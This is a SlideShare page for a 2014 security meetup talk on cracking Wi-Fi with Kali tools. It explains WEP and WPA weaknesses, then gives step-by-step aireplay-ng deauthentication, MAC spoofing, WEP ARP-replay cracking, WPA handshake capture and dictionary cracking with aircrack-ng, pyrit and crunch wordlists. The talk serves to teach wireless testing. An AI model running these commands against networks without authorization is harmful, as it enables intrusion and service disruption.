Wireless Cracking Using Kali
Asish Agarwalla
Terminology
• SSID (Service Set Identifier)
– An SSID is the Name of a Network
• BSSID (Basic Service Set Identifier)
– MA...
Monitor Mode
• Monitor mode allows to monitor all traffic
received from the wireless network without
having associate with...
Hidden SSID
• Passive Mode
– Use Wireshark/airodump and wait for any client to
connect to AP
• airodump-ng --channel <chan...
Mac Filtering Bypass
• Passive Mode
– Use Wireshark/airodump and wait for any client to connect to AP
– airodump-ng –chann...
WEP (Wired Equivalent Privacy)
Wireless Security
• Two types of WEP authentication
– Open System Authentication
– Shared K...
WEP Encryption
IV(24 Bit) Secret Key(40Bits)+
RC4 Algorithm Data ICV
Cipher Text ICV
WEP Weakness
• IV only 24-bits in WEP, IV must repeat
after 2^24 or ~ 16.7M packets
• IV sent in clear text
• CRC-32 is no...
WEP Cracking
1. Start Monitor Mode: airmon-ng start wlan0
2. Identify the target BSSID, SSID, Channel using airodump-ng:
a...
WEP Cracking
6. Send deauth packet to a specific client:
aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0
7...
WEP Packet Decrypting
1. airdecap-ng -w <Shared Key> <captured_file.cap>
2. The decrypted files are stored in a file named...
WPA/WPA2
• WPA uses TKIP encryption algorithm
• WPA2 mandatorily uses the AES-CCMP
algorithm for encryption
• WPA and WPA2...
WPA/WPA2 4 Ways Handshake
WPA/WPA2 4 Ways Handshake
• Both Client and AP Generate Pairwise Master Key (PMK )
• PMK is derived using the WPA/WPA2 PSK...
WPA/WPA2 4 Ways Handshake
• The device sends his snonce and a MIC to AP
• Now AP will calculate the PTK using the same
5 p...
WPA/WPA2 Dictionary Attack
WPA/WPA2 Cracking
1. Start Monitor Mode: airmon-ng start mon0
2. Identify the target BSSID, SSID, Channel using airodump-n...
Speeding up WPA/WPA2 PSK cracking
with PMK
• Generate PMK : Genpmk –f <password file> -d
<output file> -s “SSID”
• cowpatt...
Speeding up WPA/WPA2 PSK cracking
with PMK
• Import password to pyrit
– pyrit -i <password file> import_passwords
• Create...
Password File
• crunch <min><max> <letter> -t <guess>
• Ex: crunch 10 10 1234567890 -t
98767@@@@@
Thanks
asishagarwalla@gmail.com
9379773260
Upcoming SlideShare
Loading in...5
×

Wireless Cracking using Kali

4,303

Published on

null Bangalore Chapter - March 2014 Wireless Humla

Published in: Education
0 Comments
6 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
4,303
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
188
Comments
0
Likes
6
Embeds 0
No embeds

No notes for slide

Wireless Cracking using Kali

  1. 1. Wireless Cracking Using Kali Asish Agarwalla
  2. 2. Terminology • SSID (Service Set Identifier) – An SSID is the Name of a Network • BSSID (Basic Service Set Identifier) – MAC address of the access point(AP) • Wireless Client
  3. 3. Monitor Mode • Monitor mode allows to monitor all traffic received from the wireless network without having associate with an access point or ad hoc network. • Create a monitor mode interface – airmon-ng start <wlan interface> – Ex: airmon-ng start wlan0
  4. 4. Hidden SSID • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP • airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Sending de-authentication packets using aireplay and Use Wireshark/airodump to monitor the traffic. – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Probe Request and Probe Response packets will contains the SSID of the network.
  5. 5. Mac Filtering Bypass • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP – airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Force all connected client to authenticate again by sending de- authentication packets using aireplay and use Wireshark/ airodump to monitor the traffic – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Once we find a whitelisted client's MAC address, we can spoof the MAC address of the client using the macchanger utility .
  6. 6. WEP (Wired Equivalent Privacy) Wireless Security • Two types of WEP authentication – Open System Authentication – Shared Key Authentication • Encrypt all network packages using – a stream-cipher (RC4) for confidentiality – a checksum (CRC-32) for integrity know as ICV • 64 Bit key = 24Bit IV + 40 Bit Key • 128 Bit Key = 24Bit IV + 104 Bit Key
  7. 7. WEP Encryption IV(24 Bit) Secret Key(40Bits)+ RC4 Algorithm Data ICV Cipher Text ICV
  8. 8. WEP Weakness • IV only 24-bits in WEP, IV must repeat after 2^24 or ~ 16.7M packets • IV sent in clear text • CRC-32 is not cryptographically secure to authenticate the message
  9. 9. WEP Cracking 1. Start Monitor Mode: airmon-ng start wlan0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
  10. 10. WEP Cracking 6. Send deauth packet to a specific client: aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0 7. Fake authentication: aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac address> mon0 8. Generate data packets using Arp Replay: aireplay -3 -b <bssid> -h <attacker machine/connected client mac address> mon0 9. Crack : aircrack-ng <file.cap>
  11. 11. WEP Packet Decrypting 1. airdecap-ng -w <Shared Key> <captured_file.cap> 2. The decrypted files are stored in a file named captured_file-dec.cap 3. Open the captured_file-dec.cap using wireshark
  12. 12. WPA/WPA2 • WPA uses TKIP encryption algorithm • WPA2 mandatorily uses the AES-CCMP algorithm for encryption • WPA and WPA2 support PSK and EAP-based authentication • WPA/WPA2 PSK is vulnerable to a dictionary attack
  13. 13. WPA/WPA2 4 Ways Handshake
  14. 14. WPA/WPA2 4 Ways Handshake • Both Client and AP Generate Pairwise Master Key (PMK ) • PMK is derived using the WPA/WPA2 PSK passphrase supplied by the user, along with the SSID. The combination of both of these are sent through the Password Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key. • The AP sends a psuedo-randomly generated Anonce to the device . • The device generates its own psuedo-random Snonce. • The device then uses these two nonces, the MAC address of the AP, the MAC address of the device, and the PMK, to create a key called the Pairwise Temporal Key (PTK) which is 64 bytes, or 512 bits in length
  15. 15. WPA/WPA2 4 Ways Handshake • The device sends his snonce and a MIC to AP • Now AP will calculate the PTK using the same 5 parameter and compare its MIC(message integrity code) with client sent MIC • If both matches AP singed his anonce using PTK and send it along with key installation
  16. 16. WPA/WPA2 Dictionary Attack
  17. 17. WPA/WPA2 Cracking 1. Start Monitor Mode: airmon-ng start mon0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0 6. Crack : aircrack-ng -w <password file> <file.cap>
  18. 18. Speeding up WPA/WPA2 PSK cracking with PMK • Generate PMK : Genpmk –f <password file> -d <output file> -s “SSID” • cowpatty –d <pmkfile> -s “SSID” -r <captured file> • Crack pyrit: pyrit -r <captured file> -i <pmk file> attack_cowpatty
  19. 19. Speeding up WPA/WPA2 PSK cracking with PMK • Import password to pyrit – pyrit -i <password file> import_passwords • Create a essid in pyrit – pyrit -e <ssid> creat_essid • Generate PMK – pyrit batch • Crack using PMK – pyrit -r <captured file> attack_db
  20. 20. Password File • crunch <min><max> <letter> -t <guess> • Ex: crunch 10 10 1234567890 -t 98767@@@@@
  21. 21. Thanks asishagarwalla@gmail.com 9379773260
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×